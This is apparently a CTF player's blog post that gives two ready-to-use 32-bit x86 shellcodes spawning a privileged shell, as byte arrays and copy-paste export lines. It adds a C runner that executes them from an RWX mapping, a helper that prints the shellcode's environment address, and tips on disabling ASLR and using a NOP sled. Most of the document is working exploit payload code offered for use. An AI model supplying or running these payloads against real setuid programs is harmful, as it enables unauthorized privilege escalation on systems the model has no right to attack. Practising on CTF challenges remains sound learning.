Wednesday, 26 March 2014

Two shellcodes and a bit of code

Usually, when you solve a challenge, you end up having to launch a shell. One of the ways to do it is to put a shellcode in an environment variable and get its address: the environment of a process lives at the top of its stack, so once you know where the variable is, you know where the shellcode is.

As a reminder, I put here the two shellcodes I use. The first one comes from http://www.shell-storm.org/shellcode/ and is a polymorphic 57-byte shellcode (it decodes itself in place, so it must sit in writable memory) launching
execve("/bin/bash", ["/bin/bash", "-p"], NULL); the -p flag stops bash from dropping the effective uid back to the real uid, which is what you want on a setuid challenge:
    "\xeb\x11\x5e\x31\xc9\xb1\x21\x80"
    "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
    "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
    "\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
    "\x71\x8a\xe2\x53\x6b\x69\x69\x30"
    "\x63\x62\x74\x69\x30\x63\x6a\x6f"
    "\x8a\xe4\x53\x52\x54\x8a\xe2\xce"
    "\x81"

On a single line, for a convenient copy-paste. Beware that bash does not interpret \x escapes inside double quotes: export SC="\xeb..." stores the backslash text, not the bytes. ANSI-C quoting ($'...') stores the raw bytes:
export SC=$'\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81'

The second one is simpler, taken from Wikipedia: 45 bytes running execve("/bin/sh", ...) on a 32-bit x86 machine. At run time it writes a NUL byte and two pointers just past its own "/bin/sh" string, so it too must sit in writable memory, which the environment on the stack is:
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff"
    "/bin/sh"

and the shellcode on one line, again with $'...' so that bash stores the bytes:
export SC=$'\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh'

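As an added example (this is not code from the original post), here is a small C checker for both shellcodes before relying on them in a challenge. It verifies the byte count, that no NUL byte is present (an environment variable, and a strcpy()-style overflow, both stop at the first NUL), that the variable really holds the raw bytes rather than the escaped text, and, on a 32-bit x86 Linux box, runs the bytes from a fresh RWX mapping in a forked child so you can see the shell come up. Function and constant names are this example's own assumptions.

```c
/* Added example, not part of the original post.
 * Sanity checks for a shellcode before putting it in an environment variable,
 * plus a fork()-based runner. Executing the bytes only makes sense on 32-bit
 * x86 Linux (or a -m32 build); the checks themselves are portable. */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

/* The two shellcodes from the post, as raw bytes. */
static const unsigned char SC_BASH_P[] =
    "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75"
    "\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
    "\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f"
    "\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81";
#define SC_BASH_P_LEN (sizeof(SC_BASH_P) - 1)   /* 57 bytes, C literal's NUL excluded */

static const unsigned char SC_SH[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SC_SH_LEN (sizeof(SC_SH) - 1)           /* 45 bytes */

/* An environment variable and a strcpy()-style overflow both end at the first
 * NUL, so the shellcode must not contain one.
 * Returns the offset of the first NUL byte, or -1 if there is none. */
static long first_nul(const unsigned char *sc, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0)
            return (long)i;
    return -1;
}

/* Checks that environment variable `name` holds exactly the raw shellcode.
 * export SC="\xeb..." in bash stores the backslash text; $'\xeb...' stores bytes.
 * Returns 1 = raw bytes present, 0 = set but different, -1 = not set. */
static int env_holds_shellcode(const char *name, const unsigned char *sc, size_t len)
{
    const char *v = getenv(name);
    if (v == NULL)
        return -1;
    return (strlen(v) == len && memcmp(v, sc, len) == 0) ? 1 : 0;
}

/* Runs the shellcode in a forked child from a private RWX mapping and returns
 * how the child ended: the shell's exit status, 126 if the shellcode returned
 * instead of exec'ing, 128+N if the child died with signal N, -1 on error.
 * The mapping must be writable as well as executable: the bash one decodes
 * itself in place and the /bin/sh one stores pointers after its string. */
static int run_shellcode_in_child(const unsigned char *sc, size_t len)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        void *buf = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (buf == MAP_FAILED)
            _exit(127);
        memcpy(buf, sc, len);
        void (*fn)(void);
        memcpy(&fn, &buf, sizeof fn);   /* object pointer -> function pointer */
        fn();
        _exit(126);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (WIFSIGNALED(status))
        return 128 + WTERMSIG(status);
    return WEXITSTATUS(status);
}

int main(void)
{
    printf("bash -p shellcode: %zu bytes, first NUL at %ld\n",
           SC_BASH_P_LEN, first_nul(SC_BASH_P, SC_BASH_P_LEN));
    printf("/bin/sh shellcode: %zu bytes, first NUL at %ld\n",
           SC_SH_LEN, first_nul(SC_SH, SC_SH_LEN));
    printf("SC holds the raw /bin/sh shellcode: %d (1 yes, 0 no, -1 unset)\n",
           env_holds_shellcode("SC", SC_SH, SC_SH_LEN));
#if defined(__i386__)
    printf("child ended with status %d\n", run_shellcode_in_child(SC_SH, SC_SH_LEN));
#endif
    return 0;
}
```

On a 64-bit host build with cc -m32 if you want the run step (both shellcodes use int 0x80 with 32-bit registers); the checks work on any architecture. Run it after the export above and the third line should print 1; with the double-quoted form it prints 0.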

Once done, a small C program can print the address of the shellcode: getenv() returns a pointer straight into the environment block of the process, which sits at the top of the stack:
#include <stdio.h>
#include <stdlib.h>   /* getenv() */

int main(void) {
    /* The cast assumes 32-bit pointers, as on the machine below; use %p on 64-bit. */
    printf("SHELLCODE found at %08x\n", (unsigned int)getenv("SC"));
    return 0;
}

Compile it and you get the address. Two caveats before reusing that value in the target: the stack must not be randomised (ASLR off, i.e. /proc/sys/kernel/randomize_va_space at 0, or the challenge run under setarch -R) and must be executable, otherwise the address changes on every run or the jump faults; and the environment block shifts with the length of the program path and with every other variable, so either run the helper from a path of the same length as the target with the same environment, or prefix the shellcode with a NOP sled to absorb the difference. The session below uses the double-quoted export, which stores the escaped text rather than the bytes; once you switch to the $'...' form the variable is shorter and the address moves accordingly.
mitsurugi@mitsu:~$ make sc
cc     sc.c   -o sc
mitsurugi@mitsu:~$ export SC="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
mitsurugi@mitsu:~$ ./sc
SHELLCODE found at bff18dcf
mitsurugi@mitsu:~$